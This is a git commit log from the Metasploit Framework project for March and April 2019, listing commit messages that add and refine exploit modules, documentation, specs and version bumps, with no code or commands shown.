Brendan Coles 1749f0572d fix docs 2019-04-19 16:07:17 +00:00
h00die 072ac00acd Land #11754 linux priv esc for SystemTap 2019-04-19 08:39:20 -04:00
Jacob Robles 7b807d4dce Add nuuo client rex and spec 2019-04-19 06:28:56 -05:00
Jacob Robles f0dfc82803 Add nuuo client request rex and spec 2019-04-19 06:26:41 -05:00
bcoles 43c7b8bb63 Fix check 2019-04-19 12:54:30 +10:00
Wei Chen 8ceefce8bf Land #11646, Add module for Rails "DoubleTap" vulnerability 2019-04-18 16:11:09 -05:00
Wei Chen 7ef9c18b58 Add another reference for rails_doubletap_file_read 2019-04-18 16:10:24 -05:00
Wei Chen c223148652 Update module documentation for rails double tap vuln 2019-04-18 16:07:55 -05:00
Wei Chen 89096f374b Update check method to support vuln checks 2019-04-18 15:39:53 -05:00
Metasploit a21f49bea9 automatic module_metadata_base.json update 2019-04-18 10:30:28 -07:00
Brent Cook 5ca87e985f Land #11753, Update glibc_origin_expansion_priv_esc 2019-04-18 12:20:13 -05:00
Brendan Coles 64ed136f09 Add SystemTap MODPROBE_OPTIONS Privilege Escalation module 2019-04-18 17:15:22 +00:00
asoto-r7 1ecb309633 Land #11717, exploit/multi/http/confluence_widget_connector 2019-04-18 12:14:09 -05:00
Metasploit 8b17a9249c Bump version of framework to 5.0.19 2019-04-18 10:07:09 -07:00
asoto-r7 a84aa4e148 Adjusted imeout for the final POST, abort cleanly on failure 2019-04-18 11:57:23 -05:00
Brendan Coles 754255a2fa Fix file description and update tested versions 2019-04-18 15:35:37 +00:00
Dhiraj Mishra 46421beda3 Documentation 2019-04-18 20:47:51 +05:30
Metasploit 4dea39ef41 automatic module_metadata_base.json update 2019-04-18 07:49:23 -07:00
Brent Cook 34da7eb05c Land #11752, bump payloads 2019-04-18 09:41:01 -05:00
Brent Cook 5f75dd1bd2 bump payload sizes 2019-04-18 09:40:12 -05:00
Brendan Coles 606e337cbd Bump metasploit_payloads-mettle to 0.5.12 2019-04-18 13:48:54 +00:00
Brent Cook 54bbcc91ba Land #11749, Update spec with new intended cmd_creds behavior 2019-04-18 07:27:35 -05:00
Jacob Robles 37f5a419b7 Update spec with new intended cmd_creds behavior
Creds behavior was changed in PR #11742
2019-04-18 05:53:23 -05:00
Brent Cook 56995eaa5e Land #11746, explicitly spawn a subshell for cmd_exec 2019-04-18 05:19:55 -05:00
Brendan Coles 10871fa115 Update tested versions 2019-04-18 09:01:51 +00:00
bcoles dd15bdd43a Update modules/auxiliary/scanner/http/springcloud_traversal.rb
Co-Authored-By: RootUp <mishra.dhiraj95@gmail.com>
2019-04-18 12:17:41 +04:00
bcoles fe66786eca Update modules/auxiliary/scanner/http/springcloud_traversal.rb
Co-Authored-By: RootUp <mishra.dhiraj95@gmail.com>
2019-04-18 12:17:31 +04:00
Tim W 31eab90c74 fix mettle cmd_exec 2019-04-18 15:30:26 +08:00
Dhiraj Mishra 5b4dbd034d springcloud_traversal.rb 2019-04-18 11:24:34 +04:00
h00die 20934f114a check for a few more bad inputs 2019-04-17 20:33:50 -04:00
Imran E. Dawoodjee 521277691e Allow users to add other files for realism.
Update docs to reflect this change.
2019-04-18 04:07:46 +08:00
James Barnett 158e3d4ad3 Land #11743, remove regex syntax from invalidate_login 2019-04-17 14:14:06 -05:00
Metasploit 54258534a4 automatic module_metadata_base.json update 2019-04-17 11:39:51 -07:00
William Vu 8e8763df5b Update invalidate_login to remove regex creds 2019-04-17 13:24:59 -05:00
Brent Cook 22085113ad Land #11729, Add Libreoffice macro exec exploit module 2019-04-17 13:21:11 -05:00
William Vu 6be1d41e35 Land #11742, username and password literal search 2019-04-17 13:07:15 -05:00
James Barnett 0c1d63c0ce Update comments as regex is no longer supported 2019-04-17 13:00:42 -05:00
James Barnett 681a4c43c6 Make user and pass options on cred lookup literal
Fixes #11555
2019-04-17 12:37:59 -05:00
bcoles 7a431b0690 Update modules/exploits/osx/local/timemachine_cmd_injection.rb
Co-Authored-By: timwr <timwr@users.noreply.github.com>
2019-04-17 22:22:59 +08:00
Shelby Pace 392078990c added x64 arch for targets 2019-04-17 08:29:58 -05:00
Metasploit 03cb3e31db automatic module_metadata_base.json update 2019-04-17 00:57:54 -07:00
Brent Cook e2b15b3d61 Land #11733, add missing osx docs and update compatibility 2019-04-17 02:48:30 -05:00
Brent Cook b35a1be946 Land #11724, Improve 'use' command to automatically search and fuzzy-match if possible 2019-04-17 02:38:29 -05:00
h00die 4d2962386e save creds from password prompt spoof 2019-04-16 20:44:45 -04:00
William Vu c03ee656a3 Merge remote-tracking branch 'upstream/master' into HEAD 2019-04-16 16:02:11 -05:00
asoto-r7 06792f7cd4 Moved documentation to 'documentation' folder 2019-04-16 14:16:52 -05:00
asoto-r7 0aaae062a4 Updated RPORT to 8090, reduced timeout of final exec.vm request to 5 sec 2019-04-16 14:13:35 -05:00
asoto-r7 8b61c5edf5 Fixed target_platform_compat to support 'Windows 10', made debugging easier 2019-04-16 13:18:00 -05:00
Metasploit b674dc8986 Bump version of framework to 5.0.18 2019-04-16 10:51:27 -07:00
Imran E. Dawoodjee 6676dcb2ec Allow user to use a file of their own choosing.
Updates to documentation and some comments in the module.
2019-04-17 00:18:27 +08:00
Shelby Pace 54edf3c008 reduced file size 2019-04-16 09:06:44 -05:00
Brent Cook 3184800329 Land #11716, check for directory traversal on internal zip paths 2019-04-16 08:24:06 -05:00
Tim W 0472f96209 add the exploit binary 2019-04-16 13:09:41 +08:00
Tim W c428684732 eject only the malformed images 2019-04-16 13:09:13 +08:00
h00die 621c7182bf osx docs and cleanup 2019-04-15 21:01:05 -04:00
Sonny Gonzalez cf7096f8ba Target path normalization fixed 2019-04-15 16:35:15 -05:00
Imran E. Dawoodjee 6c798221fb Module for CVE-2018-20250 and documentation 2019-04-16 02:21:25 +08:00
Shelby Pace d0c29e7b1e mention needed handler in usage instructions 2019-04-15 08:47:13 -05:00
Shelby Pace 8dc8a18d2b added documentation and changes for module 2019-04-15 08:26:11 -05:00
Metasploit 5d55600d7d automatic module_metadata_base.json update 2019-04-15 05:48:29 -07:00
Jacob Robles 8adecac4cf Land #11698, Add wp-google-maps unauth SQLi 2019-04-15 07:38:31 -05:00
Jacob Robles 5559de2458 Update documentation 2019-04-15 07:06:27 -05:00
Synacktiv 562de86fc9 Merge pull request #2 from jrobles-r7/wp-google-maps-sqli
Wp google maps sqli update
2019-04-15 10:17:39 +02:00
Fabio Cogno deaa66d694 Minor update 2019-04-15 00:08:10 +02:00
h00die dcc1a21251 add osx to hash identify 2019-04-14 10:12:26 -04:00
h00die 75ac760d18 Merge branch 'master' of https://github.com/rapid7/metasploit-framework into hash_lib 2019-04-14 09:32:29 -04:00
Tim W a7bd52cb2e initial commit of CVE-2019-8513 (TimeMachine cmd injection) 2019-04-14 20:58:57 +08:00
h00die 1e5253b0eb add python and generate bcrypt on fly 2019-04-13 10:36:56 -04:00
William Vu 23f28e8337 Implement "intelligent" use command with search -u 2019-04-12 18:06:08 -05:00
h00die 0739f5080a expand hashes identify library and add spec 2019-04-12 17:08:19 -04:00
bcoles 6f92b98ba2 Update modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
Co-Authored-By: Greenwolf <48361984+Greenwolf@users.noreply.github.com>
2019-04-12 21:25:13 +01:00
Jeffrey Martin f41a90a582 Land #11720, Update CONTRIBUTING.md advice on topic branches 2019-04-12 15:22:30 -05:00
Jacob Robles 028890ec51 Move ncs mixin code to rex 2019-04-12 15:12:09 -05:00
Jacob Robles 51cb4358d6 Randomize check number 2019-04-12 14:47:34 -05:00
Metasploit 7d383d8bde automatic module_metadata_base.json update 2019-04-12 12:39:42 -07:00
William Vu bbeddb2130 Land #11721, Cisco RV130 exploit updates 2019-04-12 14:31:27 -05:00
William Vu 6326aa5dda Clean up module and randomize username 2019-04-12 14:23:57 -05:00
Metasploit 7de9f5beea automatic module_metadata_base.json update 2019-04-12 12:20:17 -07:00
rrockru 2c3aec897f Refactoring 2019-04-12 22:06:56 +03:00
William Vu 2ebee1226f Land #11613, Cisco RV130 stack BOF exploit 2019-04-12 14:06:51 -05:00
Shelby Pace da0c0d7d3f added most of documentation 2019-04-12 14:01:29 -05:00
Shelby Pace 391e7cf8ef adjusted font size and color 2019-04-12 14:01:29 -05:00
Shelby Pace d7f77fdcee getting session on linux 2019-04-12 14:01:29 -05:00
Shelby Pace 700562594c getting session on windows 2019-04-12 14:01:29 -05:00
Shelby Pace 4873b7c3e6 using a path for both Windows and Linux 2019-04-12 14:01:29 -05:00
Shelby Pace 9d0c045b0d added erb file and base for module 2019-04-12 14:01:29 -05:00
rrockru 8f3bb045b9 Refactoring 2019-04-12 22:00:23 +03:00
William Vu 8fcb6adde8 Update CONTRIBUTING.md advice on topic branches
Credit to @jmartin-r7 for the verbiage.
2019-04-12 12:39:59 -05:00
bcoles 2c3464c93a Update modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
Co-Authored-By: Greenwolf <48361984+Greenwolf@users.noreply.github.com>
2019-04-12 17:49:20 +01:00
Jacob 4989498722 Update postgres_copy_from_program_cmd_exec.rb 2019-04-12 17:48:32 +01:00
bcoles 755da3482e Update modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
Co-Authored-By: Greenwolf <48361984+Greenwolf@users.noreply.github.com>
2019-04-12 17:43:19 +01:00
bcoles 7daa52af4f Update modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
Co-Authored-By: Greenwolf <48361984+Greenwolf@users.noreply.github.com>
2019-04-12 17:42:51 +01:00
bcoles e057c7e129 Update modules/exploits/multi/postgres/postgres_copy_from_program_cmd_exec.rb
Co-Authored-By: Greenwolf <48361984+Greenwolf@users.noreply.github.com>
2019-04-12 17:42:37 +01:00
Jacob 5f0c0e5694 Update postgres_copy_from_program_cmd_exec.md 2019-04-12 17:41:43 +01:00
Sonny Gonzalez 04dcd8a1f9 A more robust path resolution
and better readable is_child_of? method
2019-04-12 11:01:14 -05:00
Tim W 7b09947551 Land #11675, add android app api commands 2019-04-12 23:21:00 +08:00
Tim W 6e9698f13b use print_error for errors 2019-04-12 23:20:43 +08:00
Tim W 92eb6df526 include metasploit-payloads 1.3.66 2019-04-12 23:15:50 +08:00
Jacob 5c68ad5a13 Update postgres_copy_from_program_cmd_exec.rb 2019-04-12 11:52:15 +01:00
Quentin Kaiser 5e189196de Target consolidation. 2019-04-12 10:58:56 +02:00
Quentin Kaiser dfb1ebb2e2 Remove Stance value as it is already defined by core/exploit/cmdstager/http. 2019-04-12 10:57:50 +02:00
Sonny Gonzalez 6bf824d200 Zip import directory traversal mitigation 2019-04-11 19:08:37 -05:00
Metasploit 73ad312dbf automatic module_metadata_base.json update 2019-04-11 15:49:25 -07:00
William Vu 949e88d7dd Land #11710, Mettle updates 2019-04-11 17:41:01 -05:00
Brent Cook e7974e4955 bump mettle and other gems 2019-04-11 17:26:15 -05:00
rrockru 5df6560b0b Refactoring 2019-04-12 01:02:16 +03:00
rrockru 84a4e6f4a6 Refactoring 2019-04-12 00:16:45 +03:00
Metasploit 4624686567 automatic module_metadata_base.json update 2019-04-11 14:14:02 -07:00
rrockru 82def16953 Added TRIGGER_URL option 2019-04-12 00:12:27 +03:00
asoto-r7 513b939e61 Land #11690, Add overwrite_config action to cisco_upload_file 2019-04-11 16:05:44 -05:00
rrockru 91eb29b1fe Refactoring. 2019-04-12 00:02:18 +03:00
rrockru 319eb30cce Refactoring 2019-04-11 23:54:58 +03:00
rrockru 000c35a7ad Refactoring 2019-04-11 23:39:50 +03:00
Metasploit 0373812dda automatic module_metadata_base.json update 2019-04-11 10:32:44 -07:00
William Vu 8fcc36b6a0 Land #11714, DUMP_OUTPUT fix for SA-CORE-2019-003 2019-04-11 12:23:12 -05:00
William Vu 4dc2a86b7b Update module doc 2019-04-11 12:21:48 -05:00
William Vu db0803136a Add lost registered option DUMP_OUTPUT
Oops, I forgot this in the refactor.
2019-04-11 12:21:11 -05:00
Metasploit 7b29e6e057 Bump version of framework to 5.0.17 2019-04-11 10:03:55 -07:00
rrockru c0b4e7701f Fix docs 2019-04-11 17:54:10 +03:00
rrockru eab1f6ca54 Added Atlassian Confluence exploit documentation 2019-04-11 17:52:08 +03:00
rrockru 7881d627ca Add Atlassian Confluence RCE exploit 2019-04-11 15:55:51 +03:00
Jacob Robles 236a3ee2f5 Rename files 2019-04-11 07:04:57 -05:00
Jacob Robles 91fec97cd7 Update run logic, fix create_credential usage 2019-04-11 06:54:19 -05:00
Jacob Robles 54abfcbc2c Update check logic 2019-04-11 06:21:40 -05:00
Jacob Robles 1b2b752bef Remove rescue that is handled in HttpClient mixin 2019-04-11 06:20:48 -05:00
Jacob Robles 9385fbc3b7 Change date format 2019-04-11 06:18:52 -05:00
Metasploit 0d0dceacfa automatic module_metadata_base.json update 2019-04-10 15:30:23 -07:00
asoto-r7 b32d116e9a Land #11669, exploit/windows/fileformat/microsoft_windows_contact 2019-04-10 17:18:33 -05:00
asoto-r7 94785dabbb Renamed module from 'microsoft_windows_contact_remote_code_execution' to 'microsoft_windows_contact' 2019-04-10 17:17:50 -05:00
asoto-r7 324f2f0939 Updated documentation to reflect new simplified module options 2019-04-10 17:14:47 -05:00
asoto-r7 62bf38d530 Simplified user options, recreated CONTACT template from a clean file 2019-04-10 17:14:04 -05:00
asoto-r7 7bccdf2d0f Update documentation to detail the verification steps and describe the module options 2019-04-10 17:08:03 -05:00
Metasploit 7b3682ed77 automatic module_metadata_base.json update 2019-04-10 10:38:37 -07:00
William Vu d72672feed Land #11672, Zimbra XXE and SSRF exploit 2019-04-10 09:58:45 -05:00
ct5595 b2f2206943 Update cisco_upload_file.md 2019-04-10 09:14:37 -04:00
ct5595 a8535b9b20 Merge branch 'master' of github.com:ct5595/metasploit-framework into cisco_running_config 2019-04-10 08:42:59 -04:00
Islam Nofl 8813d0a8ad Merge pull request #1 from timwr/cleanup-11675
Accepted
2019-04-10 04:17:57 -04:00
Brent Cook 69dedcac98 Land #11704, Fix duplicate host header 2019-04-09 21:22:46 -05:00
Jacob Robles 4777fb7618 Update syntax to match 2019-04-09 20:05:00 -05:00
Metasploit 5e70904ab8 automatic module_metadata_base.json update 2019-04-09 12:04:19 -07:00
Shelby Pace 4d0a41ff1a Land #11657, add Horde form file upload 2019-04-09 13:47:59 -05:00
Shelby Pace 4018d47b65 changed if not to unless 2019-04-09 13:43:54 -05:00
Jacob Robles ee23a1557e Fix duplicate host header 2019-04-09 09:08:34 -05:00
ct5595 517cc36841 restore variables ciscoFlashCopyEntryStatus
and ciscoFlashCopyCommand for checking if the host is alive and
that the community is valid to prevent putting these in every action
2019-04-09 09:01:33 -04:00
Synacktiv e9dd2f4f06 Store the whole JSON response 2019-04-09 13:59:44 +02:00
Synacktiv b2422ab661 Remove use of service_details 2019-04-09 13:45:17 +02:00
Synacktiv 3d51fdb003 Improve send_sql_request 2019-04-09 13:42:43 +02:00
Quentin Kaiser 3517a4e237 Adapt ranking and mention potential stability issue. 2019-04-09 11:31:15 +02:00
RatioSec Research b56e171172 Fix extraction of session tokens 2019-04-09 09:28:52 +01:00
Brent Cook a5184d39dc Land #11702, use a released metasm gem for update 2019-04-08 18:12:01 -05:00
Jeffrey Martin dfd35cd7e3 Bump to released metasm 1.0.4 2019-04-08 17:55:43 -05:00
Jeffrey Martin 8502f0cc53 Land #11701, Bump rex-powershell version to 0.1.80 2019-04-08 16:07:08 -05:00
Pearce Barry 0e33a55805 Bump rex-powershell gem version to 0.1.80...
...to pick up https://github.com/rapid7/rex-powershell/pull/18.
2019-04-08 16:00:02 -05:00
ct5595 56c38b8205 Merge branch 'master' of github.com:ct5595/metasploit-framework into cisco_running_config 2019-04-08 16:34:17 -04:00
ct5595 2412aa7472 fixed EOL errors from msftidy 2019-04-08 16:29:36 -04:00
ct5595 403cf825a8 modify cisco_upload_file to include actions
default action is Upload_File, which was the original function
the new action Override_Config will override the running config
2019-04-08 16:12:21 -04:00
ct5595 f34314547b update description to reflect upcoming changes and add ct5595 to list of authors 2019-04-08 13:55:13 -04:00
Metasploit 3c2c42677d automatic module_metadata_base.json update 2019-04-08 08:55:07 -07:00
Brent Cook e32bb9e915 Land #11682, don't check 'localhost' unconditionally, fix headers 2019-04-08 10:39:18 -05:00
Brent Cook e9eb008a7a Land #11699, fix Failure scoping for psexec 2019-04-08 10:29:02 -05:00
Brent Cook 0308f80c0e fix Failure scoping (needed for libraries) 2019-04-08 09:57:22 -05:00
Brent Cook 24a1dc856a Land #11694, early merge fix for https://github.com/jjyg/metasm/pull/39 2019-04-08 09:10:15 -05:00
ct5595 9a7d5d96f5 remove previous changes 2019-04-08 09:39:35 -04:00
ct5595 d848361dc6 Added ct5595 to the list of authors 2019-04-08 09:19:17 -04:00
ct5595 8762bd0842 Merge branch 'master' of github.com:ct5595/metasploit-framework into cisco_running_config 2019-04-08 09:13:55 -04:00
Tim W 52fdc4aab1 more cleanup 2019-04-08 18:11:45 +08:00
Tim W ed2dea1158 fix whitespace 2019-04-08 16:54:29 +08:00
Synacktiv 7f60f0b6cc Create wp_google_maps_sql_injection.md 2019-04-08 10:53:29 +02:00
Synacktiv ab1926b7ee Create wp_google_maps_sql_injection.rb 2019-04-08 10:50:41 +02:00
Jacob 69b1f233a8 Update postgres_copy_from_program_cmd_exec.md 2019-04-08 00:20:39 +01:00
Jacob 11385ae29a Update postgres_copy_from_program_cmd_exec.rb 2019-04-08 00:19:55 +01:00
Fabio Cogno 20a8324d8e Add Pimcore from 4.0.0 to 5.6.6 Unserialize RCE 2019-04-07 22:44:02 +02:00
Jeffrey Martin e8eed3bb6a use branched metasm until 2.5 fix is released 2019-04-06 19:50:23 -05:00
Metasploit b2be6bb75c automatic module_metadata_base.json update 2019-04-06 13:52:56 -07:00
Pearce Barry 7e62a69e16 Land #11660, Update use_single_quotes to wrap_double_quotes 2019-04-06 15:44:39 -05:00
h00die ba4990041d osx support for unifi 2019-04-06 11:08:17 -04:00
CorrM 92855dfc1b remove whitespace 2019-04-04 19:38:14 -04:00
Metasploit 0c7e589db8 automatic module_metadata_base.json update 2019-04-04 13:32:00 -07:00
Shelby Pace fff129ae9f Land #11587, add Wordpress core RCE module 2019-04-04 15:22:56 -05:00
Shelby Pace 6efd80e139 added note in info 2019-04-04 15:19:58 -05:00
Shelby Pace 2884d9afcb modified checks, added function 2019-04-04 15:09:12 -05:00
Metasploit 2710c422c2 Bump version of framework to 5.0.16 2019-04-04 10:08:31 -07:00
ct5595 8786150bdf Added functionality for OVERRIDE_CONFIG option 2019-04-04 10:43:08 -04:00
ct5595 b5449b7035 Added OVERRIDE_CONFIG option to cisco_upload_file.rb 2019-04-04 09:47:42 -04:00
CorrM fc638e521b Add root version for (app_install, app_uninstall). improve code syntax
[-] Add root param to `app_install`
[-] Add root param to `app_uninstall`
[-] improve `cmd_` functions syntax
2019-04-04 00:54:25 -04:00
Metasploit 45752affd0 automatic module_metadata_base.json update 2019-04-03 17:29:13 -07:00
William Vu a2165a2954 Land #11685, proper XML encoding for Wemo exploit 2019-04-03 19:20:43 -05:00
William Vu e164c2350c Properly encode command input with XML entities
REXML would make this less ghetto.
2019-04-03 19:10:27 -05:00
Shelby Pace d5ac1e3a33 minor adjustments to indentation and requests 2019-04-03 19:03:47 -05:00
Metasploit 40a3f3c24f automatic module_metadata_base.json update 2019-04-03 12:51:31 -07:00
Adam Cammack de6397445c Land #11681, Remove trailing space in metadata 2019-04-03 14:34:41 -05:00
Javan Rasokat 8350effaa5 Fixed wrong check (did never work)
* HOST was always localhost 
* Now sends both Range and the legacy 'Request-Range'
TODO: Method HEAD is not always sufficient, should be editable
2019-04-03 16:23:58 +02:00
Ben Schmeckpeper 7d1f6afd4a Remove trailing space from CVE reference 2019-04-03 09:21:55 -05:00
CorrM 2ef2e65424 Ready 2019-04-02 18:06:56 -04:00
Metasploit ced68536ab automatic module_metadata_base.json update 2019-04-02 13:04:27 -07:00
William Vu bc4857954e Land #11679, duplicate mailcleaner_exec CVE fix 2019-04-02 14:55:36 -05:00
todb-r7 9e3984ea51 Remove duplicate CVE for Mailcleaner module
See #11304
2019-04-02 12:51:09 -05:00
cbrnrd 18286ca2f7 Use start_with? instead of [0] 2019-04-02 13:43:30 -04:00
cbrnrd f353df952c Use fail_with() instead of return 2019-04-02 13:42:07 -04:00
Brent Cook 94eb039bd3 Land #11677, add missing payload specs 2019-04-02 07:23:16 -05:00
CorrM 3923c20bb8 appapi first commit 2019-04-02 06:35:23 -04:00
wilfried 3081b13a1f Adding payload in exploit code 2019-04-02 10:24:48 +02:00
Islam Nofl 5542d2b1ce Merge branch 'master' into corrm 2019-04-01 19:25:23 -04:00
Metasploit 46535074f6 automatic module_metadata_base.json update 2019-04-01 16:24:03 -07:00
Jeffrey Martin a53ce7539d add missing payload specs 2019-04-01 18:23:52 -05:00
surefire 1b6cd64016 Land #11136, exploit/multi/misc/weblogic_deserialize_unicastref 2019-04-01 18:15:26 -05:00
surefire 40191e5a01 Dissected JSOs, randomized strings, copied T3 header breakdown from @acamro 2019-04-01 18:05:45 -05:00
Jacob Robles 3d662bd962 Fix words because words... 2019-04-01 17:21:23 -05:00
Jacob Robles 69062bb220 Syntax fixes 2019-04-01 17:05:42 -05:00
Metasploit 601719f0e8 automatic module_metadata_base.json update 2019-04-01 14:07:11 -07:00
CorrM d3e83d4557 Android application controller #2 2019-04-01 16:55:01 -04:00
CorrM ae07e611a7 Android application controller 2019-04-01 16:51:06 -04:00
William Vu 06397bb087 Land #11636, postgres_createlang version check fix 2019-04-01 15:21:57 -05:00
Metasploit 3318f52524 automatic module_metadata_base.json update 2019-04-01 12:20:28 -07:00
surefire f292befed4 Land #11134, exploit/multi/misc/weblogic_serialize_marshalledobject 2019-04-01 14:11:30 -05:00
surefire 4d0e47044b Fixed a hardcoded payload length resulting in 40% failures 2019-04-01 14:05:39 -05:00
Brendan Coles ddbd7ba080 Case insensitive match 2019-04-01 18:58:14 +00:00
Aaron Ringo 28983df234 Addition of yum package manager module and documentation 2019-04-01 13:26:45 -05:00
Metasploit 66a6b61441 automatic module_metadata_base.json update 2019-04-01 10:47:23 -07:00
William Vu 5867158238 Land #11595, can_flood post module 2019-04-01 12:38:46 -05:00
William Vu f5f4c4bec2 Clean up module 2019-04-01 12:24:35 -05:00
Jacob Robles c07b015734 File cleanup 2019-04-01 11:39:40 -05:00
William Vu 36deeceae9 Land #11652, search -u to use first search result 2019-04-01 11:30:30 -05:00
William Vu e577b8f46a Prefer print_status for status message 2019-04-01 11:30:11 -05:00
BrennerLittle 58be84b3b8 Create microsoft_windows_contact_remote_code_execution.md
added documentation
2019-04-01 09:55:03 -05:00
Jacob Robles 51d1216953 Update module name 2019-04-01 07:48:26 -05:00
Jacob Robles 7441cd7fa3 Add Zimbra Doc 2019-04-01 07:33:27 -05:00
Jacob Robles 0873ba7ac1 Add Zimbra XXE to RCE module 2019-04-01 07:32:57 -05:00
cbrnrd 0069eed4e2 Add datastore option for printing results 2019-03-31 17:58:23 -04:00
Aaron Ringo 22c3fe35f7 Changed hook payload to redirect errors, to not show up on target screen 2019-03-31 12:09:40 -05:00
BrennerLittle e733d225b6 microsoft_windows_contact_remote_code_execution 2019-03-31 11:12:09 -05:00
Aaron Ringo 299334ae7f fixed bug where alphanumeric was never hit 2019-03-30 22:51:18 -05:00
Aaron Ringo 38bf99e729 Re-add of module after jacking up rebase, with new arches,conditional logic, documentation 2019-03-30 22:04:21 -05:00
Brent Cook edca25d277 remove search 'use by number' option, only use if there is one match 2019-03-30 20:01:40 -05:00
PietroBiondi 2afd27a671 1)Fixed documentation format 2)Refactoring and more efficient loop 2019-03-30 17:12:15 +01:00
Mustafa Çalap 560620dbe9 Add documentation for onion omega2 scanner module 2019-03-30 17:41:03 +03:00
Mustafa Çalap 9957eda362 Add onion omega2 http login scanner module 2019-03-30 17:37:05 +03:00
RatioSec Research 80ca30dc49 Apply fix requests on documentation 2019-03-30 10:19:55 +00:00
William Vu 496f270b30 Update use_single_quotes to wrap_double_quotes 2019-03-29 18:14:56 -05:00
Metasploit d3f30297dd automatic module_metadata_base.json update 2019-03-29 14:30:54 -07:00
Brent Cook 82b7c926fe Land #11579, Add support for splunk 7.2.4 to splunk_upload_app_exec 2019-03-29 16:22:26 -05:00
Metasploit 795cc90586 automatic module_metadata_base.json update 2019-03-29 13:54:37 -07:00
Brent Cook 9c38d58e9f Land #11625, add es file explorer open port CVE-2019-6447 module 2019-03-29 15:46:09 -05:00
RatioSec Research f73e9347b9 Fix documentation for Horde For File Upload 2019-03-29 16:23:53 +00:00
RatioSec Research 8aa2c45cb5 Add documentation for Horde For File Upload 2019-03-29 16:20:59 +00:00
RatioSec Research 5c84e9e61a Remove web root guessing since not reliable 2019-03-29 16:16:06 +00:00
Metasploit f048cde596 automatic module_metadata_base.json update 2019-03-29 08:57:01 -07:00
William Vu 269cb4bca6 Land #11635, Authors check for msftidy 2019-03-29 10:45:31 -05:00
William Vu af494300ec Add timwr as an author to his own modules 2019-03-29 10:44:58 -05:00
William Vu c1758037b9 Include only common module types in Authors check 2019-03-29 10:44:22 -05:00
RatioSec Research f8c5852902 Add Horde Form File Upload 2019-03-29 12:31:14 +00:00
cbrnrd 9de8865930 Merge branch 'cve_2019_5418' of https://github.com/cbrnrd/metasploit-framework into cve_2019_5418 2019-03-28 22:50:53 -06:00
cbrnrd fd4c70d0d4 Clean up loot add and route checks 2019-03-28 22:49:07 -06:00
Brent Cook a5dbf18ade fix the module showing path 2019-03-28 20:36:45 -05:00
Brent Cook 9e3ca56cdd error handling 2019-03-28 20:26:34 -05:00
bcoles 8e41da35b9 Update modules/auxiliary/gather/rails_doubletap_file_read.rb
Co-Authored-By: cbrnrd <cbawsome77@gmail.com>
2019-03-28 19:26:31 -06:00
bcoles d3fc786223 Update modules/auxiliary/gather/rails_doubletap_file_read.rb
Co-Authored-By: cbrnrd <cbawsome77@gmail.com>
2019-03-28 19:26:20 -06:00
bcoles 2370b93bfc Update modules/auxiliary/gather/rails_doubletap_file_read.rb
Co-Authored-By: cbrnrd <cbawsome77@gmail.com>
2019-03-28 19:26:13 -06:00
Brent Cook 07ce0cf358 add search-by-number support that allows 'use' on the module in one easy step
This implements a feature request from a few years back, adding a numeric column to module search, as well as a '-u' option that automatically uses the first module that matches, or if the user specifies a number value, the nth module that matches.
2019-03-28 20:17:01 -05:00
cbrnrd f6fc11a1e4 Switch AKA to 'Notes' section 2019-03-28 19:02:01 -06:00
Metasploit 6060c7ac06 automatic module_metadata_base.json update 2019-03-28 16:01:53 -07:00
Brent Cook 0a24266029 Land #11482, RV320 Unauthenticated RCE 2019-03-28 17:53:05 -05:00
cbrnrd 25d16fa6df Merge branch 'cve_2019_5418' of https://github.com/cbrnrd/metasploit-framework into cve_2019_5418 2019-03-28 13:56:51 -06:00
cbrnrd 02671909e4 Fix review things
Add depth option, fix style things, add more references.
2019-03-28 13:56:19 -06:00
Metasploit 51e204af70 Bump version of framework to 5.0.15 2019-03-28 10:08:24 -07:00
Metasploit 845805f15e automatic module_metadata_base.json update 2019-03-28 07:16:26 -07:00
h00die 1e6850fa53 land #11623 oracle 12 support for hashdumper 2019-03-28 10:07:54 -04:00
h00die 2a311931d3 oracle hashdump cleanup 2019-03-28 10:06:56 -04:00
p0w1 1e0ab44033 Fix Space EOL 2019-03-28 10:56:59 +01:00
p0w1 0470e76f45 Fix Code Style 2019-03-28 10:56:12 +01:00
p0w1 430c2f42b1 Fix Code Style 2019-03-28 10:03:11 +01:00
Carter Brainerd 07075198c3 Delete old file 2019-03-27 21:32:59 -06:00
7043mcgeep f2a19d5e32 Final revisions 2019-03-27 21:53:52 -05:00
cbrnrd 3df60336d7 Add docs 2019-03-27 19:14:32 -06:00
cbrnrd 58b286c930 Add some more logging and checks 2019-03-27 19:13:25 -06:00
Brent Cook dbbf1ea5cb Land #11644, Add check for active database to relevant Msf::Payload::UUID::Options methods 2019-03-27 15:52:20 -05:00
Metasploit 9d5163ca1a automatic module_metadata_base.json update 2019-03-27 13:29:27 -07:00
Wei Chen 927d20cb95 Land #11592, Add CMS Made Simple (CMSMS) Showtime2 File Upload RCE 2019-03-27 15:21:07 -05:00
Wei Chen 38bdccb91a Use instance variables instead of datastore options 2019-03-27 15:17:32 -05:00
fabiocogno fdb1f4adea Update cmsms_showtime2_rce.rb
Fix to CSRF Token stealing function for older versions of CMSMS
2019-03-27 20:09:14 +01:00
Matthew Kienow 337e061a77 Skip operation if there is no active database 2019-03-27 13:03:37 -04:00
cbrnrd 5fc0422897 Add Rails Doubletap module 2019-03-27 11:02:08 -06:00
p0w1 19324ee6b9 Fix EOL 2019-03-27 17:13:54 +01:00
p0w1 6175870c55 Style Fixes 2019-03-27 17:12:08 +01:00
William Vu cfe3e8fba9 Fix tidy auxiliary and payload modules 2019-03-27 09:59:55 -05:00
Jacob 592cc6cc2d Update postgres_copy_from_program_cmd_exec.rb 2019-03-27 10:40:14 +00:00
p0w1 b95b8988ad Remove Space at EOL 2019-03-27 11:20:53 +01:00
p0w1 ee50471bb5 Fix check function 2019-03-27 11:12:07 +01:00
p0w1 5fd5725a34 Added RCE Exploit for logistcs software 2019-03-27 10:23:49 +01:00
Metasploit 1981e9be0c automatic module_metadata_base.json update 2019-03-26 16:52:37 -07:00
Jeffrey Martin 6a0a7c996a Land #11637, Fix a git snafu when landing 2019-03-26 18:42:42 -05:00
h00die 3f9c9341f9 add 2016 authors 2019-03-26 19:39:17 -04:00
asoto-r7 399532154d Fix a git snafu when landing #11131
While landing PR #11131, I tripped over my own shoelaces and overwrote `weblogic_deserialize_rawobject.rb` with `weblogic_deserialize_unicastref.rb`, destroying my changes and introducing a great deal of confusion.

